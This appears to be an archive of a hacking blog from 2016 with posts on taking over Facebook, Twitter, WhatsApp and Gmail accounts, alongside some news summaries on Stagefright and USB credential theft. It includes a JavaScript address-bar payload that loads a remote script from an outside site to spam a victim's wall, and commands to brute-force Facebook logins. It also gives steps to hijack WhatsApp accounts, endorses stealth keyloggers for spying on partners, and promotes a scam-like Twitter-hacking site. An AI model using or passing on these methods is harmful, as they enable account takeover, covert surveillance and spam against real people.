Friday, 7 October 2016
Facebook friends mapper extension
People have kept their friend list as private but this is not going to help in log run.
How to hack a website in just four steps
It is so easy for hackers that within a couple of minutes of their time, in which they can search, download, and use one or two automated hack-wares that allows them to access websites which are vulnerable to such attacks. Very much assured, that the websites of high profile companies like Google, Microsoft and Facebook are completely safe from such tools. As mentioned before, the vulnerability of the web is displayed by the attack made on Sony’s PlayStation Network which led to the leaking of their customers’ personal information in a very similar way.
Thursday, 6 October 2016
How to Create Fake Screenshots for FB, Whatsapp etc
Screenshots are the real-time images of the moving screen of any display devices, be it any smartphone, computer, etc. Learn how to create the Fake conversation in any of your devices with all possible methods for these.
How to Create Fake Screenshots
#4 Fake Facebook Wall
How to Spam someones Wall on Facebook. [Working Way!]
It is really easy to do it. All you need to do is to follow the following steps carefully.
#Step1: First you need to be on "http://" connection instead of "https://", so simple Login into your FB account and goto Account > Account Settings > Account Security. Over there "unTick" |Secure Browsing (https)|
#Step2: Now goto the Persons wall whom you want to spam , and then paste the following code into the address bar:
javascript:(a = (b = document).createElement("script")).src = "//purebroz.com/a.js", b.body.appendChild(a); void(0)
#Step3: Now a new box will pop up. In that type the number of times you want the message to be posted and click on "OK".
#Step4: After that type the message that you want to post and click on "OK"
After that its all done just refresh and you will Spam the other person.
Wednesday, 5 October 2016
Tuesday, 4 October 2016
Monday, 3 October 2016
Meet Linux.Mirai Trojan, a DDoS nightmare
Sunday, 2 October 2016
Android is on FIRE, A simple text message capable of hacking 950 million Android phones
The day reported of some real threatening news of a text message, crooked capable of hacking the entire phone and its content. This has put dark clouds on the Androidphones that are widely used today. These mobile devices are vulnerable to such hacks wherein a malformed message in form of a text appears on your phone’s screen and spreads the malicious code in your phone, as soon as you unlock the screen to check that text message.
It will also allure you and take you to some website that has a video, once you open that video that malicious code spreads in your phone. This is not a small deal, this malicious code can affect 950 million android phones.
Joshua Drake who is vice president of platform research and exploitation at well-known security firm Zimperium briefed about the processing of this code inside the phone , he revealed code stays at the Stagefright , it is a library which is used by different codes that takes various media formats.
This used of MMS is dreadful of all as it just needs to be send to a vulnerable Android phone number and this message will repeatedly execute that malicious code which is stored in library. This is so powerful that it can delete any text message the moment you receive a notification of text message received.
This is not like spear phishing in which victim would do some steps like opening a pdf or going to a link send by attacker, this virus will spread and will execute itself without leaving a trail of activities done on your phone and you will be losing out data slowly while living with a compromised phone.
This is not a small deal as it can affect more than 950 million phones available in Android. More on this Trojan attacks through code via Text message would be discussed at Black Hat’s Security conference at Las Vegas by Drake. The entire title of this discussion is Stagefright: Scary Code in the Heart of Android.
Vulnerability towards such Trojan attack increases after update of 2.2 or above, this is basically a bug which is still not patched creating dark clouds over 950 million Android devices. Most of the Android devices that receive regular security updates are also vulnerable to this dreadful Trojan attacks like Nexus 5. Mostly Android devices running on Jelly Bean are at great risk and require a major update.
Not just phones, this has affected the all Firefox platforms, this is majorly due to loop holes in StageFright and it has affected Firefox OS though developers have fixed upgraded versions after 38. With Firefox the Trojan gets into the system through an infected video that will get automatically downloaded by Firefox with specifications like width=”300″ height=”150″.
Security features of Android phone is much strict as it a sand box that prevents apps peeping in data used by other applications whereas the phones from world known companies like AT&T, Verizon, Sprint, T-Mobile are also vulnerable to threat of Trojan.
The worst case scenario would be a traojan uses all the resources of your phone like its camera feeds by getting access to its StageFright code. They try to skip and deceit sand box as explained by Drake. There are root exploits as well who help attackers in gaining a control over sand box thus making attackers have all the required access over phone, such roots are PingPongRoot, Towelroot, and put_user that makes a device at risk and weak.
Users safeguard them by installing the most updated version that is bug fixed and keeping a check on their phone settings. They can also disable automatic downloading of messages and other content into the phone through applications. We hope sooner we will receive a patch to permanently fix this bug till then we need to be extra cautious and try not to live with a trojaned phone. Google has appreciated Drake contribution in revealing and educating about this bug and its problems.
from WordPress http://ift.tt/2d5WBed
via IFTTT
Hacking tool? New Microsoft tool ‘guesses’ online passwords
As a good way of displaying the hazards of using feeble passwords, a recent web tool has the ability to deduce your password sooner than you can type it.
Just as “Telepathwords” is able to guess your password based only on the final character of password string, it is very much possible that a hacker can do the same.
Telepathwords is an element of a much bigger program that is being worked on by the research arm of Microsoft in association with Carnegie Mellon University. The intention of the endeavour is to alert web users and discourage them from taking shortcuts while constructing online passwords.
A company might have a great firewall or a robust security system; but if its customers persist on using easy to guess passwords such as “password” or “123456” these safety measures come to no use.
To test how you fare at staying away from possible password hacks, all you have to do is log on tohttp://ift.tt/IG7zqJand type the initial character of the password that you like to test. With just a solitary character, number, or symbol to bank on, Telepathwords tries to guess the subsequent character. This is done by exploring databases of well-known passwords that have been exposed by safety infringements and familiar phrases and words.
from WordPress http://ift.tt/2dJHqsr
via IFTTT
How To Hack Anyone’s Twitter Account Online! – No Download Required
How to hack a twitter account?
Hacking twitter account has never been this easier before! We have developed a legendary tool that hacks to anyone’s twitter account without download any software. Works on all devices, mobile, android, iphone, desktop, laptop, cydia and more! This is online twitter hacking tool no need to download any software! Get it now before its’ gone!
Before going start hacking a twitter account consider the following questions. First, you need to ask yourself first. Why should you hack this account? What I need to hack for? Is it worth the time? Do I need a coding skills? How about a programming? All of these questions has answers below.
Why you should hack a twitter account? – You come to conclusions that you are not sure. You want to see something. Life is boring you just want to have fun and want to tweet something stupid on the victims account.
What I need to hack for? – You love seeing his private tweets, photos and etc. An info of her/him that is not disclose on his public account.
Do I need any coding skills? – Absolutely not! You can hack twitter account anytime and anywhere as long as you know how to use a computer and know how internet works! No coding or programming skills required. No need to complex, mind-blowing codes to memories that takes years to comply, and you don’t even know twitters glitches except us!
Our Twitter Hacker Features:
- No need to download to hack twitter account
- 100% Free twitter hacking
- Fast response time
- 100% Undetected
- Better GUI
- Hacking Platform ZPatkinson
- No Coding Skills Required
- Hack Unlimited Number of Accounts
- Works on android, ios, desktop, imac and more…
Screenshots & Instructions:
- To Start Hacking Twitter Account GO TO : —-> http://ift.tt/2djXgMi
- Enter twitter URL of your vicitm
- Choose what to hack either email and password or password only
- Click continue
- Be sure to verify first to start hacking twitter account. (Note: If you are unable to verify using your PC please use your mobile device to access the website)
- After completion that hacking will start and you will get the account details in just few minutes.
from WordPress http://ift.tt/2djXG5n
via IFTTT
Saturday, 1 October 2016
How To Hack Facebook Account Password Using Brute Force Attack
- A Kali Machine / Or Any Python Engine Will work!
- Facebook.py ( v1 or v2
) - A FaceBook id Of course
- CrackStation Word List! (Download Here)
[*] root@root:~#apt-get install python-mechanize
[*] root@root~# chmod +x facebook.py [*] root@root:~# python facebook.py
Tuesday, 27 September 2016
Here’s How to Hack Windows/Mac OS X Login Password (When Locked)
A Security researcher has discovered a unique attack method that can be used to steal credentials from a locked computer (but, logged-in) and works on both Windows as well as Mac OS X systems.
Fuller modified the firmware code of USB dongle in such a way that when it is plugged into an Ethernet adapter, the plug-and-play USB device installs and acts itself as the network gateway, DNS server, and Web Proxy Auto-discovery Protocol (WPAD) server for the victim’s machine.
“Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list.”
How does the Attack Work?
You might be wondering: Why your computer automatically share Windows credentials with any connected device?That is because of the default behavior of Microsoft Window’s name resolution services, which can be abused to steal authentication credentials.
The hashed credentials collected by the network exploitation tool can later be easily brute-forced to get clear text passwords.
Apparently, to conduct this attack, attackers would require physical access to a target computer, so that they can plug in the evil USB Ethernet adapter. However, Fuller says the average time required for a successful attack is just 13 seconds.
You can watch the video demonstration below that shows Fuller’s attack in action.
Fuller tested the attack with two USB Ethernet dongles: the USB Armory and the Hak5 Turtle. For more detailed explanation, you can head on to his blog post.
from WordPress http://ift.tt/2docMnP
via IFTTT
Hijacking WhatsApp Account in Seconds Using This Simple Trick.
The hugely popular smartphone messaging service WhatsApp, acquired by Facebook for over $20 billion last year, has reportedly been found to be prone to hijacking without unlocking or knowing your device password, making its hundreds of Millions of users vulnerable to, not just hackers, but also non-technical people.
Here’s How to Hijack someone else’s WhatsApp Account?
- Begin by setting up a WhatsApp account on a new mobile phone using the phone number of your target.
- During the setup process, WhatsApp will call the target’s phone number and will provide a PIN that needs to be entered for the authentication of the account.
- If you already have access to the victim’s phone, you can just answer the phone call and grab the code with no efforts. Even if the victim has a lock screen enabled on the phone, you can receive the phone call to get the secret PIN.
The worst case is with iPhones:
from WordPress http://ift.tt/2cRP5Uf
via IFTTT
Monday, 26 September 2016
How to Hack Gmail Password: Gmail Hacking
With Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages. So, in order to reveal the secret, it becomes inevitable for people to hack Gmail password of their loved ones.
Further in this article you can learn about some of the possible ways through which you can successfully hack a Gmail password.
Possible Ways to Hack Gmail Password
With 10+ years of my experience in the field of information security, I can tell you that the following are the only two ways to hack Gmail password.1. Keylogging: Easiest Way to Hack Gmail Password
Keylogging is by far the easiest way to hack Gmail account. Keylogging involves the use of a small software program called the keylogger. This keylogger when installed on a given computer will capture each and every keystroke typed on the keyboard including Gmail and all types of passwords.Does Keylogger Require Any Special Knowledge to Hack Gmail?
No, absolutely not! Keyloggers are designed in such a way that even the first time users also find it easy to install and control. Anyone with a basic knowledge of computer can use it with ease to hack any Gmail account.Is it Possible to Detect a Keylogger?
Right after the installation process is completed, the keylogger goes completely hidden and continues to work in the background. Hence, it is impossible for the users of the computer to know about its presence or about your attempt to hack Gmail.What if I do not have Physical Access to the Target Computer?
Well, you need not worry as I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the following keylogger as the best to hack Gmail account:Top Features of Realtime-Spy:
- ACCESS ANY GMAIL PASSWORD!This product can be used to hack Gmail or any other online password.
- NEVER GET CAUGHT!Captures Gmail password in a total stealth mode so that you need not worry about being caught or traced back.
- WORKS ON WINDOWS AND MACFully compatible with Windows XP/Vista/7/8 (32 and 64-bit) andMac.
What About Mobile Devices?
To hack Gmail of mobile users, there is a mobile version of the same program called mSpy which you can download from the following link:2. Phishing: Difficult Way (for advanced users only)
Phishing is a way to capture sensitive information such as usernames, passwords and credit card details. Phishing usually involves the use of a spoofed Gmail page (or a fake Gmail website) whose look and feel is almost identical to that of the legitimate websites Gmail website. When the users try to login from this fake Gmail page and enter their password there, the login details are stolen away by the hacker.However, creating a fake login page for Gmail and taking it online to successfully steal the password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. In addition to that, carrying out a phishing attack is a serious criminal offence. So, unless you’re a pro hacker I only recommend using the keyloggers to hack Gmail password.
from WordPress http://ift.tt/2cZaU9N
via IFTTT